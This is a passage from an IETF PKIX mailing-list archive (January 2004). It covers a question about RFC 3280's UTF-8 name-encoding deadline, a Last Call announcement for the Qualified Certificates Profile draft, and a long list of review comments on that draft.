face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">I have a problem with the UTF-8 requirements = in RFC=20 3280 after December 31, and would appreciate guidance on = interpretation of RFC=20 3280 as well as other implementers view on = this.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">The situation:<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">Conforming CA:s must encode attributes of=20 DirectotyString types as UTF-8 after <o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">December 31, = 2003.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">Exceptions are stated in RFC 3280 (section=20 4.1.2.4):<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> Exceptions to the December 31, = 2003 UTF8=20 encoding requirements are as<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> = follows:<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> (a) CAs = MAY issue=20 "name rollover" certificates to support = an<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> orderly = migration to=20 UTF8String encoding. Such certificates=20 would<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> include the = CA's=20 UTF8String encoded name as issuer and and the = old<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> name encoding = as=20 subject, or vice-versa.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> (b) As = stated in=20 section 4.1.2.6, the subject field MUST = be<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> populated = with a=20 non-empty distinguished name matching the<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> contents of = the issuer=20 field in all certificates issued by the<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> subject CA = regardless=20 of encoding.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">My interpretation of this=20 is:<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">a) only applies for self issued certificates = with the=20 same CA name as issuer and subject (but in different encodings). = Introducing=20 such name roll-over certificates extend the certificate chain and may = be=20 problematic since it may break both naming and path length constraints = expressed by chaining CAs.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">b) seams to be a catch 22. You can populate = the=20 subject field with old encoding to match old encoded issuer names in=20 descending certificates, but since no descending CA can populate the = issuer=20 field with old encoding it doesn’t really = apply.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">The issue:<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">There seems to be a problem with practical = reality=20 here in case the interpretation above is = correct.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">Question 1)<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">What if I have a Root CA valid to 2020 with = subject=20 and issuer name in old encoding?<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">Can that Root CA issue an intermediary CA = certificate=20 with the issuer field in old encoding, matching the subject field of = the=20 current root CA Certificate?<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">Question 2)<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">What if I have a CA with a current operating = CA=20 certificate that expires 2006. Can this CA issue certificates after = December=20 31, with the issuer name in old encoding, matching the encoding of the = current=20 CA certificate until it expires, or must this CA change its name and = have its=20 CA certificate renewed before December = 31?<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">If RFC 3280 prevents operating CAs to issue=20 certificates with the issuer field matching the CA:s current = certificate,=20 until it expires, then we face a huge legacy problem. Especially since = name=20 matching for different encoding types are not=20 required.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">4.1.2.4 states<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">“(a) attribute values encoded in = different types=20 (e.g.,<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> = PrintableString and=20 BMPString) MAY be assumed to represent<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"> different=20 strings;”<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">If my concerns are wrong and the issuing = such=20 certificates is allowed, then this needs to be=20 clarified.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: = Arial"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: = Arial"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoNormal><STRONG><B><FONT face=3DArial color=3Dolive = size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt; COLOR: olive; FONT-FAMILY: Arial">Stefan=20 Santesson</SPAN></FONT></B></STRONG><o:p></o:p></P> <P class=3DMsoNormal><FONT face=3DArial color=3Dolive size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt; COLOR: olive; FONT-FAMILY: Arial">Program = Manager,=20 Windows Security</SPAN></FONT><o:p></o:p></P> <P class=3DMsoNormal><FONT face=3D"Times New Roman" size=3D3><SPAN=20 style=3D"FONT-SIZE: = 12pt"><o:p> </o:p></SPAN></FONT></P></DIV></BLOCKQUOTE></BODY></HTML= > ------=_NextPart_000_0108_01C3E408.549C0C10-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QHbmm6050829; Mon, 26 Jan 2004 09:37:48 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0QHbmKd050828; Mon, 26 Jan 2004 09:37:48 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from asgard.ietf.org (asgard.ietf.org [132.151.6.40]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QHbki5050821 for <ietf-pkix@imc.org>; Mon, 26 Jan 2004 09:37:47 -0800 (PST) (envelope-from apache@asgard.ietf.org) Received: from apache by asgard.ietf.org with local (Exim 4.14) id 1AlAft-0006wM-AA; Mon, 26 Jan 2004 12:37:25 -0500 X-test-idtracker: no To: IETF-Announce :; From: The IESG <iesg-secretary@ietf.org> Subject: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Reply-to: iesg@ietf.org Message-Id: <E1AlAft-0006wM-AA@asgard.ietf.org> Date: Mon, 26 Jan 2004 12:37:25 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> The IESG has received a request from the Public-Key Infrastructure (X.509) WG to consider the following document: - 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile <draft-ietf-pkix-sonof3039-04.txt> as a Proposed Standard The IESG plans to make a decision in the next few weeks, and solicits final comments on this action. Please send any comments to the iesg@ietf.org or ietf@ietf.org mailing lists by 2004-02-09. The file can be obtained via http://www.ietf.org/internet-drafts/draft-ietf-pkix-sonof3039-04.txt Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QHarUa050782; Mon, 26 Jan 2004 09:36:53 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0QHar8J050781; Mon, 26 Jan 2004 09:36:53 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from woodstock.binhost.com (woodstock.binhost.com [144.202.240.3]) by above.proper.com (8.12.11/8.12.8) with SMTP id i0QHaqID050774 for <ietf-pkix@imc.org>; Mon, 26 Jan 2004 09:36:52 -0800 (PST) (envelope-from housley@vigilsec.com) Received: (qmail 6306 invoked by uid 0); 26 Jan 2004 17:36:48 -0000 Received: from unknown (HELO Russ-Laptop.vigilsec.com) (141.156.179.104) by woodstock.binhost.com with SMTP; 26 Jan 2004 17:36:48 -0000 Message-Id: <5.2.0.9.2.20040126113311.04821fc0@mail.binhost.com> X-Sender: housley@mail.binhost.com X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Mon, 26 Jan 2004 11:34:03 -0500 To: Denis Pinkas <Denis.Pinkas@bull.net>, Stefan Santesson <stefans@microsoft.com>, Tim Polk <wpolk@nist.gov>, Magnus Nystrom <magnus@RSASECURITY.COM> From: Russ Housley <housley@vigilsec.com> Subject: Re: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt Cc: ietf-pkix@imc.org In-Reply-To: <4014D841.503@bull.net> References: <200401202044.PAA20813@ietf.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Denis: I have just requested IETF Last Call on this document. I will treat these comments as the first Last Call comments. Russ At 10:05 AM 1/26/2004 +0100, Denis Pinkas wrote: >Stefan, Magnus and Tim, > >Please find 38 comments on <draft-ietf-pkix-sonof3039-03.txt> > >1. The text states: > > "The profile defines specific conventions for certificates that are > qualified within a defined legal framework, named Qualified > Certificates." > >It is unclear what the topic of this document is about. This sentence does >not explain. To illustrate the concern if we had the following sentence, >it would be the same problem : > > "The profile defines specific conventions for certificates that are > certified within a defined legal framework, named Certified > Certificates." > >What means qualified ? What would mean certified ? > >Since the definition of a legal framework is outside the scope, it could >be any kind of certificate as long as it is issued for a natural person, >which is the only restriction advertised. Then why is it under a "legal >framework" ? It would be appropriate under any kind of certificate policy. >The text should not place any emphasis on a "legal framework". > >This document simply defines a profile of a certificate for natural persons. > >The technical content of this document should be clearly advertised. >Hereafter is a proposal, intended to be a full replacement of the second >paragraph : > > "This document provides a profile for two fields: issuer and > subject and for three certificate extensions: subject alternate > name, subject directory attributes, and key usage. It also defines > two extensions: biometric information and qualified certificate > statements". > > >2. The use of the wording "Qualified Certificate" is unfortunate since it >creates a confusion with the same wording used in the European Directive >on Electronic Signatures. > >If the wording "qualified certificate" needs to be kept, a warning should >be given in the abstract. In order to avoid readers to misunderstand what >is a qualified certificate in the context of this document, the following >sentence should be added: > >"It should be noticed that the meaning of "Qualified Certificate" as used >in this document is different from the same wording used in the European >Directive on Electronic Signatures." > >The European Directive on Electronic Signatures should be referenced in >the informative reference section. > > >3. In section 1, 6 th paragraph, the text states: > > "It should be noted that this specification does not define the > specific semantics of Qualified Certificates, and does not define the > policies that should be used with them. That is, this document > defines what information should go into Qualified Certificates, but > not what that information means. A system that uses Qualified > Certificates must define its own semantics for the information in > Qualified Certificates. It is expected that laws and corporate > policies will make these definitions." > >This is not true. The only semantics which is undefined is the semantics >of specific Qualified Certificate Statements. Please delete. > > >4. The text states: > >"This specification differs from RFC 3039 in the following basic areas: > > * Some editorial clarifications has been made to introductory > sections to clarify that this profile is generally applicable to a > broad type of certificates even if its prime purpose is to > facilitate issuance of Qualified Certificates." > >The abstract states : > >" The profile is however not limited to Qualified Certificates and > further profiling may facilitate specific local needs." > >Since a Qualified Certificate is a profile limited to natural person, it >is unclear to understand what this sentence means. Please delete. > > >5. The text states: > > * To better facilitate broad applicability of this profile some > constraints on key usage settings in the key usage extension has > been removed. > >This "constraints" were a recommendation that is still true and is >currently proposed to be included to answer to a "defect report" raised on >key usage on X.509 / IS0 9594-8. It is likely that this constraint will be >accepted. This explanation should be removed and the recommendation that >is present in RFC 3039 should remain. > > >6. The text states: > > * A new qc-Statement reflecting this second version of the profile > has been defined in Section 3.2.5.1 > >What about backwards compatibility ? >Has anybody used the predefined qcStatement-1 ? Until we got a confirmed >no response, it is not possible to suppress the document (i.e. RFC 3039) >which tells what it means. Otherwise, implementations based on RFC3039 >will suddenly become invalid. If nobody has ever implemented the >predefined qcStatement-1, then there would be no reason to support it in >3039bis. > > >7. The text states in section 2 , Requirements and Assumptions. > > "The term "Qualified Certificate" has been used by the European > Commission to describe a certain type of certificates with specific > relevance for European legislation. This specification is intended > to support this class of certificates, but its scope is not limited > to this application. > > Within this standard the term "Qualified Certificate" is used > generally, describing a certificate whose primary purpose is to > identify a person with high level of assurance, where the certificate > meet some qualification requirements defined by an applicable legal > framework. The actual mechanisms that decide whether a certificate > should or should not be considered to be a "Qualified Certificate" in > regard to any legislation are outside the scope of this standard." > >Full text proposal replacement: > > "The term "Qualified Certificate" is used by the European Directive > on Electronic Signature to refer to specific type of certificate. > The same term is used in this document with a different meaning, > i.e. to define a profile of a certificate issued to natural persons, > and which imposes constraints on the structure of the name of the > subject and of the issuer." > > >8. The text states in section 2 , Requirements and Assumptions. > > "Harmonization in the field of identity certificates issued to natural > persons, in particular Qualified Certificates, is essential within > several aspects that fall outside the scope of RFC 3280." > >This sentence is using the term "identity certificate" instead of >"Qualified certificate". This is in fact much better and it is unfortunate >to use the term "Qualified Certificate" everywhere within this document >instead of "Identity certificate". This sentence should be deleted, since >it is difficult to argue that harmonisation is essential without providing >any reason. > > >9. The text states in section 2 , Requirements and Assumptions. > >"The most important aspects that affect the scope of this specification >are: > > - Definition of names and identity information in order to identify > the associated subject in a uniform way." > >What is the difference between a "name" and an "identity information" ? >Can a name identify a subject ? Not always. > >Proposed rewording: > >The most important aspects that affect the scope of this specification >are: > > - Definition of attributes of the subject DN in order to name > the associated subject in a uniform way." > > >10. The text states in section 2 , Requirements and Assumptions. > >"The most important aspects that affect the scope of this specification >are: > > - Definition of information which identifies the CA and the > jurisdiction under which the CA operates when issuing a particular > certificate. > >Qualified certificates (as meant by this document) are supposed to be >applicable for a "defined legal framework". What is the relationship with >the "jurisdiction under which the CA operates" ? > >Qualified certificates (as meant by the EU Directive) identify the country >where the CA operates. While this has a well defined meaning, it seems >rather difficult to give a meaning to this statement outside the EU Directive. > >Proposed rewording: > >"The most important aspects that affect the scope of this specification >are: > > - Definition of information which identifies the country where > the CA operates when issuing a certificate." > > >11. The text states in section 2 , Requirements and Assumptions. > >"The most important aspects that affect the scope of this specification >are: > > - Definition of a standardized way to store predefined statements > with relevance for Qualified Certificates." > >Delete: "with relevance for Qualified Certificates". > > >12. The text states in section 2.1 Properties: > > "This profile accommodates profiling needs for Qualified Certificates > based on the assumptions that: > > - Qualified Certificates are issued by a CA that makes a public > statement that the certificate serves the purpose of a Qualified > Certificate, as discussed in Section 2.2." > >It is quite strange to mandate to make a public statement here. >Do we require a public statement when RFC 3280 compliant certificates >are issued ? To which of the sections would it mean compliance ? > >Delete this item. > > >13. The text states in section 2.1 Properties: > > - The Qualified Certificate indicates a certificate policy > consistent with liabilities, practices and procedures undertaken > by the CA, as discussed in Section 2.3." > >There is no precise definition of such a certificate policy and precise >definitions are outside the scope of the PKIX WG. > >Delete this item. > > >14. The text states in section 2.1 Properties: > > - The Qualified Certificate contains an identity based on a > pseudonym or a real name of the subject. > >No identity is ever contained in a certificate. > >Proposed rewording: > > - The Qualified Certificate contains a name which may be either > based on the real name of the subject or a pseudonym." > > >15. The text states in section 2.2 Statement of Purpose > > "This profile defines two complementary ways to include this > information: > > - As information defined by a certificate policy included in the > certificate policies extension, and > > - As a statement included in the Qualified Certificates Statements > extension." > >As far as "EU Qualified Certificates" are concerned, the ways are not >"complementary", but "alternative". > >Since no CP OID is being defined in the document to indicate this >"property" (which is quite vague), this cannot be supported. > >Since no statement is being defined in the document to indicate this >"property" (which is quite vague), this cannot be supported. > >Please delete the whole section 2.2. > > >16. The text states in section 2.3 Policy Issues > > "Certain policy aspects define the context in which this profile is to > be understood and used. It is however outside the scope of this > profile to specify any policies or legal aspects that will govern > services that issue or utilize certificates according to this > profile." > >Is it necessary to say that some other documents (please keep away "policy >aspects") whatever they are may use this document ? Isn't it the primary >goal of any standard ? > >Please delete this paragraph. > > >17. The text states in section 2.3 Policy Issues: > > "It is however an underlying assumption in this profile that a > responsible issuing CA will undertake to follow a publicly available > certificate policy that is consistent with its liabilities, practices > and procedures." > >This assumption is not valid. Nothing will force a CA to adopt a publicly >available policy. Please delete this paragraph. > > >18. The text states in section 2.4 Uniqueness of names > > " An > object can be assigned a distinguished name without being represented > by an entry in the Directory, but this name is then the name its > object entry could have had if it were represented in the Directory. > In the context of qualified certificates, a distinguished name > denotes a set of attribute values [X.501] which forms a name that is > unambiguous within a certain domain that forms either a real or a > virtual DIT (Directory Information Tree)[X.501]. In the case of > subject names the domain is assumed to be at least the issuing domain > of the CA. > >These sentences do not help to understand the issue of uniqueness of >names. The fact that there is a real DIT or not is irrelevant. The notion >of "a certain domain" and "at least the issuing domain" is hazardous. >Please delete these sentences and keep the last sentence which is correct: > > "The distinguished name MUST be unique for each subject > entity certified by the one CA as defined by the issuer name field, > during the whole life time of the CA." > > >19. The text states in section 3.1.1 Issuer > > "The identity of the issuer SHALL be specified using an appropriate > subset of the following attributes:" > >Please change "identity" by "DN". > > >20. The text states in section 3.1.1 Issuer : > >"Attributes present in the issuer field SHOULD be consistent with the laws >under which the issuer operates." > >We do not reference laws in other documents, but Certificate Policies >instead. Please refer to Certificate policies, and replace with: > >"Attributes present in the issuer field SHOULD be consistent with the >certificate policy of the certificate." > > >21. The text states in section 3.1.1 Issuer : > > "A relying party MAY have to consult associated certificate policies > and/or the issuer's CPS, in order to determine the semantics of name > fields and the laws under which the issuer operates." > >Please delete the end of the sentence, i.e. "and the laws under which the >issuer operates". There is no reason to refer to laws. > > >22. The text states in section 3.1.2 Subject (page 8): > >" Other attributes may be present but MUST NOT be necessary to > distinguish the subject name from other subject names within the > issuer domain." > >This sentence is wrong. The DN is uniquely global with all the attributes >present. Matching rules do not exclude some attributes. This sentence >could be interpreted as if a name matching rule could be constructed using >only these attributes and ignoring the additional ones. Please delete that >sentence. > > >23. The text states in section 3.1.2 Subject (pages 8 and 9): > > "The surname and givenName attribute types SHALL, if present, > contain the name of the subject, in accordance with the > laws under which the CA prepares the certificate. These > attributes SHALL be used in the subject field if the commonName > attribute is not present. In cases where the subject only has a > single name registered, the givenName attribute SHALL be used and > the surname attribute SHALL be omitted." > >What is the "registered name" of the subject ? Who is registering the name ? >Which laws is it ? Is it the laws where the CA operates ? Do all countries >have a law to say what is a registered name ? Please to not refer to >"registered names" and national laws. > > "The surname and givenName attribute types SHALL be used in the > subject field if the commonName attribute is not present. In > cases where the subject only has a givenName the surname attribute > SHALL be omitted." > > >24. The text states in section 3.2 Certificate Extensions: > > "This specification provides additional details regarding the contents > of five certificate extensions: Subject directory attributes, > Certificate policies, Key usage, Biometric information and Qualified > Certificate statements." > >This is not correct. It is not "details regarding the content of five >certificate extensions", but a profile for two basic fields, three >existing extensions and the definition of two new extensions. > >Change with: > > "This specification provides profiles for two fields: issuer and > subject and for three certificate extensions: subject alternate > name, subject directory attributes, and key usage. It also defines > two extensions: biometric information and qualified certificate > statements." > > >25. The text defines in section 3.2.1 Subject Directory Attributes. Why >is there no specification at all for the Subject Alternative Name ? > >There should be a section saying that Internet electronic mail addresses >SHALL be placed there, if e-mail addresses need to be present. > > >26. The text states in section 3.2.2 Certificate Policies: > > "Information provided by the issuer stating the purpose of the > certificate as discussed in Section 2.2 SHOULD be evident through > indicated policies." > >It is not evident from an OID to know what the certificate policy is about. >Since section 2.2 should be deleted, this sentence should be deleted as well. > > >27. The text states in section 3.2.2 Certificate Policies: > > "The certificate policies extension SHOULD include all policy > information needed for validation of the certificate." > >The Certificate Policies extensions defines everything that is needed. >There is nothing to be added here. Please delete that sentence. > >28. The text states in section 3.2.2 Certificate Policies: > > "If policy information is included in the QCStatements extension > (see 3.2.5), then this information SHOULD also be defined by > indicated policies." > >QCStatements extension is still not described at this place when reading >the document in sequence. This sentence is not relevant and could even be >misleading: QCStatements is not a direct alternative to a certificate >policy. It may indicate a conformity with a document where some parts of >it may be translated into a certificate policy. Please delete that sentence. > > >29. It is very questionable why there should be a section 3.2.2 at all. >There is no additional specific constraints beyond what already exists in >RFC 3280. Please delete the whole section 3.2.2. > > >30. The text states in section 3.2.3 Key Usage: > > "The key usage extension SHALL be present. Key usage settings SHALL be > set in accordance with RFC 3280 definitions. Further requirements on > key usage settings MAY be defined by local policy and/or local legal > requirements." > >The security consideration section states: > > "Combining the nonRepudiation bit in the keyUsage certificate > extension with other keyUsage bits may have security implications and > this specification therefore recommends against such practices." > >This is quite true. However the main body of the document is lacking this >recommendation. The text that is currently in RFC 3039 should stay. It >should be adapted to avoid naming bit 1 as nonRepudiation since it is >likely that the name of that bit will be changed by ISO. So speaking of >bit 1 is neutral and will be valid whatever the final name will be. > >Please replace with: > > The key usage extension SHALL be present. If the key usage bit 1 > is asserted then it SHOULD NOT be combined with any other key usage, > i.e., if set, it SHOULD be set exclusively (see the security > considerations section). > > >31. The text states in section 3.2.3 Key Usage: > > "The key usage extension MAY be marked critical." > >However, RFC 3280 states: > > "When this extension appears, it SHOULD be marked critical." > >The "MAY" should be changed into "SHOULD". > >This leads to: > > "The key usage extension SHOULD be marked critical." > > >32. The text states in section 3.2.5 Qualified Certificate Statements: > > "A statement suitable for inclusion in this extension MAY be a > statement by the issuer that the certificate is issued as a Qualified > Certificate in accordance with a particular legal system (as > discussed in Section 2.2)." > >Providing examples before the actual definition of what is this extension >is not appropriate. It should also be avoided to speak about "legal >systems". Please delete. > > >33. The text states in section 3.2.5 Qualified Certificate Statements: > > "Other statements suitable for inclusion in this extension MAY be > statements related to the applicable legal jurisdiction within which > the certificate is issued. As an example this MAY include a maximum > reliance limit for the certificate indicating restrictions on CA's > liability." > >Providing examples before the actual definition of what is this extension >is not appropriate. It should also be avoided to speak about "legal >jurisdiction". Please delete. > > >34. The text states in section 3.2.5 Qualified Certificate Statements: > > "This extension may be critical or non-critical. If the extension is > critical, this means that all statements included in the extension > are regarded as critical." > >A note should be added after the ASN.1 description : > >"NOTE: This extension does not allow to mix critical and non-critical >Qualified Certificate Statements. Either all statements must be critical >or all statements must be non-critical." > > >35. The text states in section 3.2.5.1 Predefined Statements: > > "RFC 3039 defined one qualified certificate statement (id-qcs- > pkixQCSyntax-v1), identifying conformance with syntax and semantics > defined in RFC 3039." > >What means conformance with syntax and semantics ? Conformance clauses >means that the SHALL statements have to be observed by the CA. From which >sections should the SHALL statements be observed ? The document provides a >profile for two fields: issuer and subject, for one mandatory certificate >extensions: key usage and for two optional certificate extensions: subject >alternate name and subject directory attributes. > >It means conformance with sections 3.1.1. Issuer, 3.1.2 subject, 3.2.3 >key usage; if subject directory attributes is present, with section >3.2.1.; and if subject alternate name attribute is present, with >section 3.2.X. > >There is however a major problem: if RFC3039 is withdrawn, then there >would be no text to say what it means. So RFC 3039 cannot be withdrawn >without knowing first if someone as ever implemented id-qcs-pkixQCSyntax-v1. > > >36. The text states in section 3.2.5.1 Predefined Statements: > > "This profile includes a new qualified certificate statement > (identified by the OID id-qcs-pkixQCSyntax-v2), identifying > conformance with syntax and semantics defined in this profile." > >The sentence should be corrected in the following way: > > "This profile includes a qualified certificate statement > (identified by the OID id-qcs-pkixQCSyntax-v2), identifying > conformance with sections 3.1.1. Issuer, 3.1.2 subject, 3.2.3 key > usage ; if subject directory attributes is present, with section > 3.2.1.; and if subject alternate name attribute is present, with > section 3.2.X. > > >37. The text states in section 3.2.5.1 Predefined Statements: > > "This Qualified Certificate profile is referred to as version 2 > while RFC 3039 is referred to as version 1." > >This sentence cannot stay and will need to be fixed. See comment 35. > > >38. The European Directive on Electronic Signatures should be referenced >in the informative references section (section 5.2). > >END OF COMMENTS > >Denis > > >>A New Internet-Draft is available from the on-line Internet-Drafts >>directories. >>This draft is a work item of the Public-Key Infrastructure (X.509) >>Working Group of the IETF. >> Title : Internet X.509 Public Key Infrastructure: >> Qualified Certificates Profile >> Author(s) : S. Santesson, M. Nystrom >> Filename : draft-ietf-pkix-sonof3039-03.txt >> Pages : 35 